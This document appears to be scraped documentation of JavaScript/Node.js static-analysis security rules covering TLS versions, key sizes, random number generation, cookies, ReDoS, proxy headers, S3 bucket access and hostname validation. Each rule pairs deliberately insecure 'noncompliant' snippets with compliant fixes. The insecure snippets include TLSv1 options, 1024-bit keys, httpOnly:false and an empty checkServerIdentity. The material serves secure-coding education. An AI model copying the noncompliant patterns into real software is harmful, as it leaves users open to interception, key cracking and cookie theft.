The Optimal Asymmetric Encryption Padding scheme (OAEP) adds randomness and a secure hash function that strengthens the regular inner workings of RSA.

Resources

Articles & blog posts

Standards

javascript:S4787

This rule is deprecated; use S4426, S5542, S5547 instead.

Encrypting data is security-sensitive. It has led in the past to the following vulnerabilities:

Proper encryption requires both the encryption algorithm and the key to be strong. Obviously the private key needs to remain secret and be renewed regularly. However these are not the only means to defeat or weaken an encryption.

This rule flags function calls that initiate encryption/decryption.

Ask Yourself Whether

  • the private key might not be random or strong enough, or the same key might be reused for a long time.
  • the private key might be compromised. It can happen when it is stored in an unsafe place or when it was transferred in an unsafe manner.
  • the key exchange is made without properly authenticating the receiver.
  • the encryption algorithm is not strong enough for the level of protection required. Note that the strength of encryption algorithms decreases as time passes.
  • the chosen encryption library is deemed unsafe.
  • a nonce is used, and the same value is reused multiple times, or the nonce is not random.
  • the RSA algorithm is used, and it does not incorporate an Optimal Asymmetric Encryption Padding (OAEP), which might weaken the encryption.
  • the CBC (Cipher Block Chaining) algorithm is used for encryption, and its IV (Initialization Vector) is not generated using a secure random algorithm, or it is reused.
  • the Advanced Encryption Standard (AES) encryption algorithm is used with an insecure mode. See the recommended practices for more information.

You are at risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Generate encryption keys using secure random algorithms.
  • When generating cryptographic keys (or key pairs), it is important to use a key length that provides enough entropy against brute-force attacks. For the Blowfish algorithm the key should be at least 128 bits long, while for the RSA algorithm it should be at least 2048 bits long.
  • Regenerate the keys regularly.
  • Always store the keys in a safe location and transfer them only over safe channels.
  • If there is an exchange of cryptographic keys, check first the identity of the receiver.
  • Only use strong encryption algorithms. Check regularly that the algorithm is still deemed secure. It is also imperative that they are implemented correctly. Use only encryption libraries which are deemed secure. Do not define your own encryption algorithms as they will most probably have flaws.
  • When a nonce is used, generate it randomly every time.
  • When using the RSA algorithm, incorporate an Optimal Asymmetric Encryption Padding (OAEP).
  • When CBC is used for encryption, the IV must be random and unpredictable. Otherwise it exposes the encrypted value to cryptanalysis attacks such as chosen-plaintext attacks. Thus a secure random algorithm should be used. An IV value should be associated with one and only one encryption cycle, because the IV’s purpose is to ensure that the same plaintext encrypted twice will yield two different ciphertexts.
  • The Advanced Encryption Standard (AES) encryption algorithm can be used with various modes. Galois/Counter Mode (GCM) with no padding should be preferred to the following combinations, which are not secure:
    • Electronic Codebook (ECB) mode: Under a given key, any given plaintext block always gets encrypted to the same ciphertext block. Thus, it does not hide data patterns well. In some senses, it doesn’t provide serious message confidentiality, and it is not recommended for use in cryptographic protocols at all.
    • Cipher Block Chaining (CBC) with PKCS#5 padding (or PKCS#7) is susceptible to padding oracle attacks.

Sensitive Code Example

// === Client side ===
crypto.subtle.encrypt(algo, key, plainData); // Sensitive
crypto.subtle.decrypt(algo, key, encData); // Sensitive
// === Server side ===
const crypto = require("crypto");
const cipher = crypto.createCipher(algo, key); // Sensitive
const cipheriv = crypto.createCipheriv(algo, key, iv); // Sensitive
const decipher = crypto.createDecipher(algo, key); // Sensitive
const decipheriv = crypto.createDecipheriv(algo, key, iv); // Sensitive
const pubEnc = crypto.publicEncrypt(key, buf); // Sensitive
const privDec = crypto.privateDecrypt({ key: key, passphrase: secret }, pubEnc); // Sensitive
const privEnc = crypto.privateEncrypt({ key: key, passphrase: secret }, buf); // Sensitive
const pubDec = crypto.publicDecrypt(key, privEnc); // Sensitive

See

javascript:S4423

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

To provide communication security over a network, SSL and TLS are generally used. However, it is important to note that the following protocols are all considered weak by the cryptographic community, and are officially deprecated:

  • SSL versions 1.0, 2.0 and 3.0
  • TLS versions 1.0 and 1.1

When these unsecured protocols are used, it is best practice to expect a breach: that a user or organization with malicious intent will perform mathematical attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it within a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in Node.js

Code examples

Noncompliant code example

Node.js offers multiple ways to set weak TLS protocols. For https and tls, the following options are used; other third-party libraries accept them as well.

The first is secureProtocol:

const https = require('node:https');
const tls   = require('node:tls');

let options = {
 secureProtocol: 'TLSv1_method' // Noncompliant
};

let req    = https.request(options, (res) => { });
let socket = tls.connect(443, "www.example.com", options, () => { });

The second is the combination of minVersion and maxVersion. Note that they cannot be specified along with the secureProtocol option:

const https = require('node:https');
const tls   = require('node:tls');

let options = {
  minVersion: 'TLSv1.1',  // Noncompliant
  maxVersion: 'TLSv1.2'
};

let req    = https.request(options, (res) => { });
let socket = tls.connect(443, "www.example.com", options, () => { });

The third is secureOptions, which in this example instructs OpenSSL to disable some protocol versions altogether. In general, this option might trigger side effects and should be used carefully, if at all.

const https     = require('node:https');
const tls       = require('node:tls');
const constants = require('node:crypto').constants;

let options = {
  secureOptions:
    constants.SSL_OP_NO_SSLv2
    | constants.SSL_OP_NO_SSLv3
    | constants.SSL_OP_NO_TLSv1
}; // Noncompliant

let req    = https.request(options, (res) => { });
let socket = tls.connect(443, "www.example.com", options, () => { });

Compliant solution

const https = require('node:https');
const tls   = require('node:tls');

let options = {
  secureProtocol: 'TLSv1_2_method'
};

let req    = https.request(options, (res) => { });
let socket = tls.connect(443, "www.example.com", options, () => { });

Alternatively, restrict the accepted range with minVersion and maxVersion:

const https = require('node:https');
const tls   = require('node:tls');

let options = {
  minVersion: 'TLSv1.2',
  maxVersion: 'TLSv1.2'
};

let req    = https.request(options, (res) => { });
let socket = tls.connect(443, "www.example.com", options, () => { });

Here, the goal is to turn on only TLSv1.2 and higher, by turning off all lower versions:

const https     = require('node:https');
const tls       = require('node:tls');
const constants = require('node:crypto').constants;

let options = {
  secureOptions:
    constants.SSL_OP_NO_SSLv2
    | constants.SSL_OP_NO_SSLv3
    | constants.SSL_OP_NO_TLSv1
    | constants.SSL_OP_NO_TLSv1_1
};

let req    = https.request(options, (res) => { });
let socket = tls.connect(443, "www.example.com", options, () => { });

How does this work?

As a rule of thumb, by default you should use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The best choices at the moment are the following.

Use TLS v1.2 or TLS v1.3

Even though TLS v1.3 is available, using TLS v1.2 is still considered good and secure practice by the cryptography community.

The use of TLS v1.2 ensures compatibility with a wide range of platforms and enables seamless communication between different systems that do not yet have TLS v1.3 support.

The only drawback arises when the framework in use is outdated: its TLS v1.2 settings may still enable older cipher suites that have been deprecated as insecure.

On the other hand, TLS v1.3 removes support for older and weaker cryptographic algorithms, eliminates known vulnerabilities from previous TLS versions, and improves performance.

Resources

Articles & blog posts

Standards

javascript:S2245

Using pseudorandom number generators (PRNGs) is security-sensitive. For example, it has led in the past to the following vulnerabilities:

When software generates predictable values in a context requiring unpredictability, it may be possible for an attacker to guess the next value that will be generated, and use this guess to impersonate another user or access sensitive information.

As the Math.random() function relies on a weak pseudorandom number generator, this function should not be used for security-critical applications or for protecting sensitive data. In such context, a cryptographically strong pseudorandom number generator (CSPRNG) should be used instead.

Ask Yourself Whether

  • the code using the generated value requires it to be unpredictable. It is the case for all encryption mechanisms or when a secret value, such as a password, is hashed.
  • the function you use generates a value which can be predicted (pseudo-random).
  • the generated value is used multiple times.
  • an attacker can access the generated value.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use a cryptographically strong pseudorandom number generator (CSPRNG) like crypto.getRandomValues().
  • Use the generated random values only once.
  • You should not expose the generated random value. If you have to store it, make sure that the database or file is secure.

Sensitive Code Example

const val = Math.random(); // Sensitive
// Check if val is used in a security context.

Compliant Solution

// === Client side ===
const crypto = window.crypto || window.msCrypto;
var array = new Uint32Array(1);
crypto.getRandomValues(array); // Compliant for security-sensitive use cases

// === Server side ===
const crypto = require('crypto');
const buf = crypto.randomBytes(1); // Compliant for security-sensitive use cases

See

javascript:S4426

This vulnerability exposes encrypted data to attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

In today’s cryptography, the length of the key directly affects the security level of cryptographic algorithms.

Note that depending on the algorithm, the term key refers to a different mathematical property. For example:

  • For RSA, the key is the product of two large prime numbers, also called the modulus.
  • For AES and Elliptic Curve Cryptography (ECC), the key is only a sequence of randomly generated bytes.
    • In some cases, AES keys are derived from a master key or a passphrase using a Key Derivation Function (KDF) like PBKDF2 (Password-Based Key Derivation Function 2).

If an application uses a key that is considered short and insecure, the encrypted data is exposed to attacks aimed at getting at the plaintext.

In general, it is best practice to expect a breach: that a user or organization with malicious intent will perform cryptographic attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it within a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in Node.js

Code examples

The following code examples either explicitly or implicitly generate keys. Note that there are differences in the size of the keys depending on the algorithm.

Due to the mathematical properties of the algorithms, the security requirements for the key size vary depending on the algorithm.
For example, a 256-bit ECC key provides about the same level of security as a 3072-bit RSA key and a 128-bit symmetric key.

Noncompliant code example

Here is an example of a private key generation with RSA:

const crypto = require('crypto');

var { privateKey, publicKey } = crypto.generateKeyPairSync('rsa', {
    modulusLength: 1024,  // Noncompliant
    publicKeyEncoding:  { type: 'spki', format: 'pem' },
    privateKeyEncoding: { type: 'pkcs8', format: 'pem' }
  });

Here is an example of a key generation with the Digital Signature Algorithm (DSA):

const crypto = require('crypto');

var { privateKey, publicKey } = crypto.generateKeyPairSync('dsa', {
    modulusLength: 1024,  // Noncompliant
    publicKeyEncoding:  { type: 'spki', format: 'pem' },
    privateKeyEncoding: { type: 'pkcs8', format: 'pem' }
  });

Here is an example of an Elliptic Curve (EC) initialization. It implicitly generates a private key whose size is indicated in the algorithm name:

const crypto = require('crypto');

var { privateKey, publicKey } = crypto.generateKeyPairSync('ec', {
    namedCurve: 'secp112r2', // Noncompliant
    publicKeyEncoding:  { type: 'spki', format: 'pem' },
    privateKeyEncoding: { type: 'pkcs8', format: 'pem' }
  });

Compliant solution

Here is an example of a private key generation with RSA:

const crypto = require('crypto');

var { privateKey, publicKey } = crypto.generateKeyPairSync('rsa', {
    modulusLength: 2048,
    publicKeyEncoding:  { type: 'spki', format: 'pem' },
    privateKeyEncoding: { type: 'pkcs8', format: 'pem' }
  });

Here is an example of a key generation with the Digital Signature Algorithm (DSA):

const crypto = require('crypto');

var { privateKey, publicKey } = crypto.generateKeyPairSync('dsa', {
    modulusLength: 2048,
    publicKeyEncoding:  { type: 'spki', format: 'pem' },
    privateKeyEncoding: { type: 'pkcs8', format: 'pem' }
  });

Here is an example of an Elliptic Curve (EC) initialization. It implicitly generates a private key whose size is indicated in the algorithm name:

const crypto = require('crypto');

var { privateKey, publicKey } = crypto.generateKeyPairSync('ec', {
    namedCurve: 'secp224k1',
    publicKeyEncoding:  { type: 'spki', format: 'pem' },
    privateKeyEncoding: { type: 'pkcs8', format: 'pem' }
  });

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The appropriate choices are the following.

RSA (Rivest-Shamir-Adleman) and DSA (Digital Signature Algorithm)

The security of these algorithms depends on the difficulty of attacks attempting to solve their underlying mathematical problem.

In general, a minimum key size of 2048 bits is recommended for both.

AES (Advanced Encryption Standard)

AES supports three key sizes: 128 bits, 192 bits and 256 bits. The security of the AES algorithm is based on the computational complexity of trying all possible keys.
A larger key size increases the number of possible keys and makes exhaustive search attacks computationally infeasible. Therefore, a 256-bit key provides a higher level of security than a 128-bit or 192-bit key.

Currently, a minimum key size of 128 bits is recommended for AES.

Elliptic Curve Cryptography (ECC)

Elliptic curve cryptography is also used in various algorithms, such as ECDSA, ECDH, or ECMQV. The length of keys generated with elliptic curve algorithms is indicated directly in their names. For example, secp256k1 generates a 256-bit private key.

Currently, a minimum key size of 224 bits is recommended for EC algorithms.

Going the extra mile

Pre-Quantum Cryptography

Encrypted data and communications recorded today could be decrypted in the future by an attack from a quantum computer.
It is important to keep in mind that NIST-approved digital signature schemes, key agreement, and key transport may need to be replaced with secure quantum-resistant (or "post-quantum") counterparts.

Thus, if data is to remain secure beyond 2030, proactive measures should be taken now to ensure its safety.


Resources

Articles & blog posts

Standards

javascript:S5757

Log management is an important topic, especially for the security of a web application. It ensures that user activity, including that of potential attackers, is recorded and available for an analyst to understand what happened in the web application in case of malicious activity.

Retention of specific logs for a defined period of time is often necessary to comply with regulations such as GDPR, PCI DSS and others. However, to protect users’ privacy, certain information is forbidden or strongly discouraged from being logged, such as user passwords or credit card numbers, which obviously should not be stored, or at least not in clear text.

Ask Yourself Whether

In a production environment:

  • The web application uses confidential information and logs a significant amount of data.
  • Logs are externalized to SIEM or Big Data repositories.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Loggers should be configured with a list of confidential, personal information that will be hidden/masked or removed from logs.

Sensitive Code Example

With Signale log management framework the code is sensitive when an empty list of secrets is defined:

const { Signale } = require('signale');

const CREDIT_CARD_NUMBERS = fetchFromWebForm();
// assume the credit card numbers are retrieved somewhere, e.g.
// ["1234-5678-0000-9999", "1234-5678-0000-8888"]

const options = {
  secrets: []         // empty list of secrets
};

const logger = new Signale(options); // Sensitive

CREDIT_CARD_NUMBERS.forEach(function(CREDIT_CARD_NUMBER) {
  logger.log('The customer ordered products with the credit card number = %s', CREDIT_CARD_NUMBER);
});

Compliant Solution

With Signale log management framework it is possible to define a list of secrets that will be hidden in logs:

const { Signale } = require('signale');

const CREDIT_CARD_NUMBERS = fetchFromWebForm();
// assume the credit card numbers are retrieved somewhere, e.g.
// ["1234-5678-0000-9999", "1234-5678-0000-8888"]

const options = {
  secrets: ["([0-9]{4}-?)+"]
};

const logger = new Signale(options); // Compliant

CREDIT_CARD_NUMBERS.forEach(function(CREDIT_CARD_NUMBER) {
  logger.log('The customer ordered products with the credit card number = %s', CREDIT_CARD_NUMBER);
});
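The same idea can be applied without any particular logging framework; a framework-agnostic sketch that masks card-like digit groups before a message reaches the logger, using a pattern similar to the Signale secrets regex above:

```javascript
// Matches four groups of four digits, optionally separated by hyphens.
const CARD_PATTERN = /\b(?:\d{4}-?){3}\d{4}\b/g;

function redact(message) {
  return message.replace(CARD_PATTERN, '[REDACTED]');
}

console.log(redact('order paid with 1234-5678-0000-9999'));
// → order paid with [REDACTED]
```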

See

javascript:S3330

When a cookie is configured with the HttpOnly attribute set to true, the browser guarantees that no client-side script will be able to read it. In most cases, when a cookie is created, the default value of HttpOnly is false and it’s up to the developer to decide whether or not the content of the cookie can be read by client-side scripts. As a majority of Cross-Site Scripting (XSS) attacks target the theft of session cookies, the HttpOnly attribute can help to reduce their impact as it won’t be possible to exploit the XSS vulnerability to steal session cookies.

Ask Yourself Whether

  • the cookie is sensitive and used to authenticate the user, for instance a session cookie
  • the HttpOnly attribute offers additional protection (this is not the case for an XSRF-TOKEN cookie / CSRF token, for example)

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • By default the HttpOnly flag should be set to true for most cookies, and it is mandatory for session / security-sensitive cookies.

Sensitive Code Example

cookie-session module:

let session = cookieSession({
  httpOnly: false,// Sensitive
});  // Sensitive

express-session module:

const express = require('express');
const session = require('express-session');

let app = express();
app.use(session({
  cookie:
  {
    httpOnly: false // Sensitive
  }
}));

cookies module:

let cookies = new Cookies(req, res, { keys: keys });

cookies.set('LastVisit', new Date().toISOString(), {
  httpOnly: false // Sensitive
}); // Sensitive

csurf module:

const cookieParser = require('cookie-parser');
const csrf = require('csurf');
const express = require('express');

let csrfProtection = csrf({ cookie: { httpOnly: false }}); // Sensitive

Compliant Solution

cookie-session module:

let session = cookieSession({
  httpOnly: true,// Compliant
});  // Compliant

express-session module:

const express = require('express');
const session = require('express-session');

let app = express();
app.use(session({
  cookie:
  {
    httpOnly: true // Compliant
  }
}));

cookies module:

let cookies = new Cookies(req, res, { keys: keys });

cookies.set('LastVisit', new Date().toISOString(), {
  httpOnly: true // Compliant
}); // Compliant

csurf module:

const cookieParser = require('cookie-parser');
const csrf = require('csurf');
const express = require('express');

let csrfProtection = csrf({ cookie: { httpOnly: true }}); // Compliant
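When a cookie is set manually through a raw Set-Cookie header rather than one of the modules above, the same flag applies; a hypothetical helper (the function name and attribute set are illustrative, not from any of the libraries shown):

```javascript
// Build a Set-Cookie value for a sensitive cookie: HttpOnly blocks script
// access, Secure restricts it to HTTPS, SameSite limits cross-site sending.
function sessionCookie(name, value) {
  return `${name}=${value}; HttpOnly; Secure; SameSite=Strict`;
}

console.log(sessionCookie('session', 'abc123'));
// → session=abc123; HttpOnly; Secure; SameSite=Strict
```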

See

javascript:S4784

This rule is deprecated; use S5852 instead.

Using regular expressions is security-sensitive. It has led in the past to the following vulnerabilities:

Evaluating regular expressions against input strings is potentially an extremely CPU-intensive task. Specially crafted regular expressions such as (a+)+s will take several seconds to evaluate the input string aaaaaaaaaaaaaaaaaaaaaaaaaaaaabs. The problem is that with every additional a character added to the input, the time required to evaluate the regex doubles. However, the equivalent regular expression, a+s (without grouping), is efficiently evaluated in milliseconds and scales linearly with the input size.
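The rewrite described above can be sketched directly; both patterns accept exactly the same strings, only the backtracking behavior differs (the inputs here are kept short so the vulnerable pattern evaluates instantly):

```javascript
const vulnerable = /^(a+)+s$/; // exponential backtracking on long 'aaa...ab' inputs
const safe = /^a+s$/;          // equivalent language, linear evaluation

for (const input of ['aaas', 'aaax']) {
  console.log(vulnerable.test(input) === safe.test(input)); // true both times
}
```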

Evaluating such regular expressions opens the door to Regular expression Denial of Service (ReDoS) attacks. In the context of a web application, attackers can force the web server to spend all of its resources evaluating regular expressions thereby making the service inaccessible to genuine users.

This rule flags any execution of a hardcoded regular expression which has at least 3 characters and at least two instances of any of the following characters: *+{ .

Example: (a+)*

Ask Yourself Whether

  • the executed regular expression is sensitive and a user can provide a string which will be analyzed by this regular expression.
  • your regular expression engine’s performance decreases with specially crafted inputs and regular expressions.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Check whether your regular expression engine (the algorithm executing your regular expression) has any known vulnerabilities. Search for vulnerability reports mentioning the one engine you’re are using.

Use if possible a library which is not vulnerable to Redos Attacks such as Google Re2.

Remember also that a ReDoS attack is possible if a user-provided regular expression is executed. This rule won’t detect this kind of injection.
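When user input must become part of a pattern, escaping its metacharacters ensures it is matched literally rather than interpreted; a minimal sketch (the character class follows the commonly cited escaping recipe):

```javascript
// Escape regex metacharacters so user input is matched literally.
function escapeRegExp(text) {
  return text.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

const userInput = '(a+)+'; // would otherwise be interpreted as a vulnerable pattern
const pattern = new RegExp(escapeRegExp(userInput));
console.log(pattern.test('literal (a+)+ here')); // matches the literal text only
```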

Sensitive Code Example

const regex = /(a+)+b/; // Sensitive
const regex2 = new RegExp("(a+)+b"); // Sensitive

str.search("(a+)+b"); // Sensitive
str.match("(a+)+b"); // Sensitive
str.split("(a+)+b"); // Sensitive

Note: String.matchAll does not raise any issue as it is not supported by NodeJS.

Exceptions

Some corner-case regular expressions will not raise an issue even though they might be vulnerable. For example: (a|aa)+, (a|a?)+.

It is a good idea to test your regular expression if it has the same pattern on both sides of a "|".

See

javascript:S5759

Users often connect to web servers through HTTP proxies.

Proxies can be configured to forward the client IP address via the X-Forwarded-For or Forwarded HTTP headers.

An IP address is personal information which can identify a single user and thus impact their privacy.

Ask Yourself Whether

  • The web application uses reverse proxies or similar but doesn’t need to know the IP address of the user.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

The user's IP address should not be forwarded unless the application needs it, for example as part of an authentication or authorization scheme, or for log management.

Sensitive Code Example

node-http-proxy

var httpProxy = require('http-proxy');

httpProxy.createProxyServer({target:'http://localhost:9000', xfwd:true}) // Noncompliant
  .listen(8000);

http-proxy-middleware

var express = require('express');

const { createProxyMiddleware } = require('http-proxy-middleware');

const app = express();

app.use('/proxy', createProxyMiddleware({ target: 'http://localhost:9000', changeOrigin: true, xfwd: true })); // Noncompliant
app.listen(3000);

Compliant Solution

node-http-proxy

var httpProxy = require('http-proxy');

// By default xfwd option is false
httpProxy.createProxyServer({target:'http://localhost:9000'}) // Compliant
  .listen(8000);

http-proxy-middleware

var express = require('express');

const { createProxyMiddleware } = require('http-proxy-middleware');

const app = express();

// By default xfwd option is false
app.use('/proxy', createProxyMiddleware({ target: 'http://localhost:9000', changeOrigin: true})); // Compliant
app.listen(3000);

See

javascript:S6281

By default, S3 buckets are private: only the bucket owner can access them.

This access control can be relaxed with ACLs or policies.

To prevent permissive policies or ACLs from being set on an S3 bucket, the following boolean settings can be enabled:

  • blockPublicAcls: whether to block public ACLs from being set on the S3 bucket.
  • ignorePublicAcls: whether to ignore existing public ACLs set on the S3 bucket.
  • blockPublicPolicy: whether to block public policies from being set on the S3 bucket.
  • restrictPublicBuckets: whether to restrict access to the S3 endpoints of public policies to the principals within the bucket owner account.

The attribute BlockPublicAccess.BLOCK_ACLS only turns on blockPublicAcls and ignorePublicAcls; public policies can still affect the S3 bucket.

All of these options can be enabled at once by setting the blockPublicAccess property of the S3 bucket to BlockPublicAccess.BLOCK_ALL.

Ask Yourself Whether

  • The S3 bucket stores sensitive data.
  • The S3 bucket is not used to store static resources of websites (images, css …​).
  • Many users have the permission to set ACL or policy to the S3 bucket.
  • These settings are not already enforced to true at the account level.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to configure:

  • blockPublicAcls to true to block new attempts to set public ACLs.
  • ignorePublicAcls to true to ignore existing public ACLs.
  • blockPublicPolicy to true to block new attempts to set public policies.
  • restrictPublicBuckets to true to restrict existing public policies.

Sensitive Code Example

By default, when not set, blockPublicAccess is fully deactivated (nothing is blocked):

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'id', {
    bucketName: 'bucket'
}); // Sensitive

This blockPublicAccess configuration allows a public ACL to be set:

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'id', {
    bucketName: 'bucket',
    blockPublicAccess: new s3.BlockPublicAccess({
        blockPublicAcls         : false, // Sensitive
        blockPublicPolicy       : true,
        ignorePublicAcls        : true,
        restrictPublicBuckets   : true
    })
});

The attribute BLOCK_ACLS only blocks and ignores public ACLs:

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'id', {
    bucketName: 'bucket',
    blockPublicAccess: s3.BlockPublicAccess.BLOCK_ACLS // Sensitive
});

Compliant Solution

This blockPublicAccess blocks public ACLs and policies, ignores existing public ACLs and restricts existing public policies:

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'id', {
    bucketName: 'bucket',
    blockPublicAccess: s3.BlockPublicAccess.BLOCK_ALL
});

A similar configuration to the one above can be obtained by setting all parameters of blockPublicAccess to true:

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'id', {
    bucketName: 'bucket',
    blockPublicAccess: new s3.BlockPublicAccess({
        blockPublicAcls         : true,
        blockPublicPolicy       : true,
        ignorePublicAcls        : true,
        restrictPublicBuckets   : true
    })
});

See

javascript:S2255

This rule is deprecated, and will eventually be removed.

Using cookies is security-sensitive and has led to vulnerabilities in the past.

Attackers can use widely-available tools to read cookies. Any sensitive information they may contain will be exposed.

This rule flags code that writes cookies.

Ask Yourself Whether

  • sensitive information is stored inside the cookie.

You are at risk if you answered yes to this question.

Recommended Secure Coding Practices

Cookies should only be used to manage the user session. The best practice is to keep all user-related information server-side and link it to the user session, never sending it to the client. In a few corner cases, cookies can be used for non-sensitive information that needs to live longer than the user session.

Do not try to encode sensitive information in a non-human-readable format before writing it to a cookie. The encoding can be reversed and the original information exposed.

Using cookies only for session IDs doesn’t make them secure. Follow OWASP best practices when you configure your cookies.

As a side note, any information read from a cookie should be sanitized.
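To illustrate the OWASP-recommended cookie attributes, here is a sketch of a helper that serializes a session cookie with hardened flags (the helper itself is hypothetical, not part of any library):

```javascript
// Build a hardened Set-Cookie header value for a session ID.
// HttpOnly blocks script access, Secure restricts transport to HTTPS,
// and SameSite=Strict limits cross-site sending.
function sessionCookie(name, value) {
  return `${name}=${encodeURIComponent(value)}; HttpOnly; Secure; SameSite=Strict; Path=/`;
}

console.log(sessionCookie('sid', 'abc123'));
// sid=abc123; HttpOnly; Secure; SameSite=Strict; Path=/
```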

Sensitive Code Example

// === Built-in NodeJS modules ===
const http = require('http');
const https = require('https');

http.createServer(function(req, res) {
  res.setHeader('Set-Cookie', ['type=ninja', 'lang=js']); // Sensitive
});
https.createServer(function(req, res) {
  res.setHeader('Set-Cookie', ['type=ninja', 'lang=js']); // Sensitive
});
// === ExpressJS ===
const express = require('express');
const app = express();
app.use(function(req, res, next) {
  res.cookie('name', 'John'); // Sensitive
});
// === In browser ===
// Set cookie
document.cookie = "name=John"; // Sensitive

See

javascript:S2817

This rule is deprecated, and will eventually be removed.

Why is this an issue?

The Web SQL Database standard never saw the light of day. It was first formulated, then deprecated by the W3C and was only implemented in some browsers. (It is not supported in Firefox or IE.)

Further, the use of a Web SQL Database poses security concerns, since you only need its name to access such a database.

Noncompliant code example

var db = window.openDatabase("myDb", "1.0", "Personal secrets stored here", 2*1024*1024);  // Noncompliant

Resources

javascript:S5527

This vulnerability allows attackers to impersonate a trusted host.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. In this process, the role of hostname validation, combined with certificate validation, is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When hostname validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

To do so, an attacker would obtain a valid certificate authenticating example.com, serve it using a different hostname, and the application code would still accept it.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable hostname validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate hostnames, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

How to fix it in Node.js

Code examples

The following code contains examples of disabled hostname validation.

Hostname validation is disabled by overriding checkServerIdentity with an empty implementation. It is highly recommended to keep the original implementation.

Noncompliant code example

const https = require('node:https');

let options = {
  hostname: 'www.example.com',
  port: 443,
  path: '/',
  method: 'GET',
  checkServerIdentity: function() {}, // Noncompliant
  secureProtocol: 'TLSv1_2_method'
};

let req = https.request(options, (res) => {
  res.on('data', (d) => {
    process.stdout.write(d);
  });
});

const tls = require('node:tls');

let options = {
  checkServerIdentity: function() {}, // Noncompliant
  secureProtocol: 'TLSv1_2_method'
};

let socket = tls.connect(443, "www.example.com", options, () => {
  process.stdin.pipe(socket);
  process.stdin.resume();
});

Compliant solution

const https = require('node:https');

let options = {
  hostname: 'www.example.com',
  port: 443,
  path: '/',
  method: 'GET',
  secureProtocol: 'TLSv1_2_method'
};

let req = https.request(options, (res) => {
  res.on('data', (d) => {
    process.stdout.write(d);
  });
});

const tls = require('node:tls');

let options = {
  secureProtocol: 'TLSv1_2_method'
};

let socket = tls.connect(443, "www.example.com", options, () => {
  process.stdin.pipe(socket);
  process.stdin.resume();
});

How does this work?

To fix the vulnerability of disabled hostname validation, it is strongly recommended to first re-enable the default validation and fix the root cause: the validity of the certificate.

Use valid certificates

